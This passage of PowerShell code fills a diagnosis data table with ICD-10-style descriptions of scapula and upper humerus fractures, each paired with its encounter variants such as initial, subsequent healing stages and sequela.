shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, left shoulder","Nondisplaced fracture of neck of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, left shoulder","Nondisplaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, left shoulder","Nondisplaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, left shoulder","Nondisplaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, left shoulder","Nondisplaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, left shoulder","Nondisplaced fracture of neck of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, unspecified shoulder","Nondisplaced fracture of neck of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, unspecified shoulder","Nondisplaced fracture of neck of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, unspecified shoulder","Nondisplaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, unspecified shoulder","Nondisplaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, unspecified shoulder","Nondisplaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, unspecified shoulder","Nondisplaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, unspecified shoulder","Nondisplaced fracture of neck of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, right shoulder","Fracture of other part of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, right shoulder","Fracture of other part of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, right shoulder","Fracture of other part of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, right shoulder","Fracture of other part of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, right shoulder","Fracture of other part of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, right shoulder","Fracture of other part of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, right shoulder","Fracture of other part of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, left shoulder","Fracture of other part of scapula, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, left shoulder","Fracture of other part of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, left shoulder","Fracture of other part of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, left shoulder","Fracture of other part of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, left shoulder","Fracture of other part of scapula, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, left shoulder","Fracture of other part of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, left shoulder","Fracture of other part of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, unspecified shoulder","Fracture of other part of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, unspecified shoulder","Fracture of other part of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, unspecified shoulder","Fracture of other part of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, unspecified shoulder","Fracture of other part of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, unspecified shoulder","Fracture of other part of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, unspecified shoulder","Fracture of other part of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of other part of scapula, unspecified shoulder","Fracture of other part of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right humerus","Unspecified fracture of upper end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right humerus","Unspecified fracture of upper end of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right humerus","Unspecified fracture of upper end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right humerus","Unspecified fracture of upper end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right humerus","Unspecified fracture of upper end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right humerus","Unspecified fracture of upper end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right humerus","Unspecified fracture of upper end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left humerus","Unspecified fracture of upper end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left humerus","Unspecified fracture of upper end of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left humerus","Unspecified fracture of upper end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left humerus","Unspecified fracture of upper end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left humerus","Unspecified fracture of upper end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left humerus","Unspecified fracture of upper end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left humerus","Unspecified fracture of upper end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified humerus","Unspecified fracture of upper end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified humerus","Unspecified fracture of upper end of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified humerus","Unspecified fracture of upper end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified humerus","Unspecified fracture of upper end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified humerus","Unspecified fracture of upper end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified humerus","Unspecified fracture of upper end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified humerus","Unspecified fracture of upper end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of right humerus","Unspecified displaced fracture of surgical neck of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of right humerus","Unspecified displaced fracture of surgical neck of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of right humerus","Unspecified displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of right humerus","Unspecified displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of right humerus","Unspecified displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of right humerus","Unspecified displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of right humerus","Unspecified displaced fracture of surgical neck of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of left humerus","Unspecified displaced fracture of surgical neck of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of left humerus","Unspecified displaced fracture of surgical neck of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of left humerus","Unspecified displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of left humerus","Unspecified displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of left humerus","Unspecified displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of left humerus","Unspecified displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of left humerus","Unspecified displaced fracture of surgical neck of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of unspecified humerus","Unspecified displaced fracture of surgical neck of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of unspecified humerus","Unspecified displaced fracture of surgical neck of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of unspecified humerus","Unspecified displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of unspecified humerus","Unspecified displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of unspecified humerus","Unspecified displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of unspecified humerus","Unspecified displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of surgical neck of unspecified humerus","Unspecified displaced fracture of surgical neck of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of right humerus","Unspecified nondisplaced fracture of surgical neck of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of right humerus","Unspecified nondisplaced fracture of surgical neck of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of right humerus","Unspecified nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of right humerus","Unspecified nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of right humerus","Unspecified nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of right humerus","Unspecified nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of right humerus","Unspecified nondisplaced fracture of surgical neck of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of left humerus","Unspecified nondisplaced fracture of surgical neck of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of left humerus","Unspecified nondisplaced fracture of surgical neck of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of left humerus","Unspecified nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of left humerus","Unspecified nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of left humerus","Unspecified nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of left humerus","Unspecified nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of left humerus","Unspecified nondisplaced fracture of surgical neck of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of unspecified humerus","Unspecified nondisplaced fracture of surgical neck of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of unspecified humerus","Unspecified nondisplaced fracture of surgical neck of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of unspecified humerus","Unspecified nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of unspecified humerus","Unspecified nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of unspecified humerus","Unspecified nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of unspecified humerus","Unspecified nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of surgical neck of unspecified humerus","Unspecified nondisplaced fracture of surgical neck of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of right humerus","2-part displaced fracture of surgical neck of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of right humerus","2-part displaced fracture of surgical neck of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of right humerus","2-part displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of right humerus","2-part displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of right humerus","2-part displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of right humerus","2-part displaced fracture of surgical neck of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of right humerus","2-part displaced fracture of surgical neck of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of left humerus","2-part displaced fracture of surgical neck of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of left humerus","2-part displaced fracture of surgical neck of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of left humerus","2-part displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of left humerus","2-part displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of left humerus","2-part displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of left humerus","2-part displaced fracture of surgical neck of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of left humerus","2-part displaced fracture of surgical neck of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of unspecified humerus","2-part displaced fracture of surgical neck of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of unspecified humerus","2-part displaced fracture of surgical neck of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of unspecified humerus","2-part displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of unspecified humerus","2-part displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of unspecified humerus","2-part displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of unspecified humerus","2-part displaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("2-part displaced fracture of surgical neck of unspecified humerus","2-part displaced fracture of surgical neck of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of right humerus","2-part nondisplaced fracture of surgical neck of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of right humerus","2-part nondisplaced fracture of surgical neck of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of right humerus","2-part nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of right humerus","2-part nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of right humerus","2-part nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of right humerus","2-part nondisplaced fracture of surgical neck of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of right humerus","2-part nondisplaced fracture of surgical neck of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of left humerus","2-part nondisplaced fracture of surgical neck of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of left humerus","2-part nondisplaced fracture of surgical neck of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of left humerus","2-part nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of left humerus","2-part nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of left humerus","2-part nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of left humerus","2-part nondisplaced fracture of surgical neck of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of left humerus","2-part nondisplaced fracture of surgical neck of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of unspecified humerus","2-part nondisplaced fracture of surgical neck of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of unspecified humerus","2-part nondisplaced fracture of surgical neck of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of unspecified humerus","2-part nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of unspecified humerus","2-part nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of unspecified humerus","2-part nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of unspecified humerus","2-part nondisplaced fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("2-part nondisplaced fracture of surgical neck of unspecified humerus","2-part nondisplaced fracture of surgical neck of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of right humerus","3-part fracture of surgical neck of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of right humerus","3-part fracture of surgical neck of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of right humerus","3-part fracture of surgical neck of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of right humerus","3-part fracture of surgical neck of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of right humerus","3-part fracture of surgical neck of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of right humerus","3-part fracture of surgical neck of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of right humerus","3-part fracture of surgical neck of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of left humerus","3-part fracture of surgical neck of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of left humerus","3-part fracture of surgical neck of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of left humerus","3-part fracture of surgical neck of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of left humerus","3-part fracture of surgical neck of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of left humerus","3-part fracture of surgical neck of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of left humerus","3-part fracture of surgical neck of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of left humerus","3-part fracture of surgical neck of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of unspecified humerus","3-part fracture of surgical neck of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of unspecified humerus","3-part fracture of surgical neck of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of unspecified humerus","3-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of unspecified humerus","3-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of unspecified humerus","3-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of unspecified humerus","3-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("3-part fracture of surgical neck of unspecified humerus","3-part fracture of surgical neck of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of right humerus","4-part fracture of surgical neck of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of right humerus","4-part fracture of surgical neck of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of right humerus","4-part fracture of surgical neck of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of right humerus","4-part fracture of surgical neck of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of right humerus","4-part fracture of surgical neck of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of right humerus","4-part fracture of surgical neck of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of right humerus","4-part fracture of surgical neck of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of left humerus","4-part fracture of surgical neck of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of left humerus","4-part fracture of surgical neck of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of left humerus","4-part fracture of surgical neck of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of left humerus","4-part fracture of surgical neck of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of left humerus","4-part fracture of surgical neck of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of left humerus","4-part fracture of surgical neck of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of left humerus","4-part fracture of surgical neck of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of unspecified humerus","4-part fracture of surgical neck of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of unspecified humerus","4-part fracture of surgical neck of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of unspecified humerus","4-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of unspecified humerus","4-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of unspecified humerus","4-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of unspecified humerus","4-part fracture of surgical neck of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("4-part fracture of surgical neck of unspecified humerus","4-part fracture of surgical neck of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of right humerus","Displaced fracture of greater tuberosity of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of right humerus","Displaced fracture of greater tuberosity of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of right humerus","Displaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of right humerus","Displaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of right humerus","Displaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of right humerus","Displaced fracture of greater tuberosity of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of right humerus","Displaced fracture of greater tuberosity of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of left humerus","Displaced fracture of greater tuberosity of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of left humerus","Displaced fracture of greater tuberosity of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of left humerus","Displaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of left humerus","Displaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater tuberosity of left humerus","Displaced fracture of greater tuberosity of left humerus, subsequent encounter for fracture with nonunion") + $null = 